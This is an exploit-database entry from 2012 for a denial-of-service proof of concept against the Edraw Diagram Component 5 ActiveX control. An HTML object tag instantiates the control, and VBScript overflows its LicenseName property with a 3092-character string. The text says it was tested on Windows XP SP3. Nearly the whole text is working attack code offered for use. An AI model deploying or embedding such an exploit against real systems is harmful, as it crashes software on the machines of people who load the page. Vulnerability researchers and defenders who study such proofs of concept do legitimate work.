id: 17489
date: 02/04/2012
title: Edraw Diagram Component 5 ActiveX buffer overflow DoS
author: Senator of Pirates
cves: 

Author : Senator of Pirates
This exploit tested on Windows Xp SP3 EN
http://www.edrawsoft.com/download/EDBoardSetup.exe
--------------------------------------------------------------------------------------------------------
<object classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\edboard\EDBoard.ocx"
prototype  = "Invoke_Unknown LicenseName As String"
memberName = "LicenseName"
progid     = "EDBoardLib.EDBoard"
argCount   = 1
arg1=String(3092, "A")
target.LicenseName = arg1
</script>



#  0day.today [2023-03-23]  #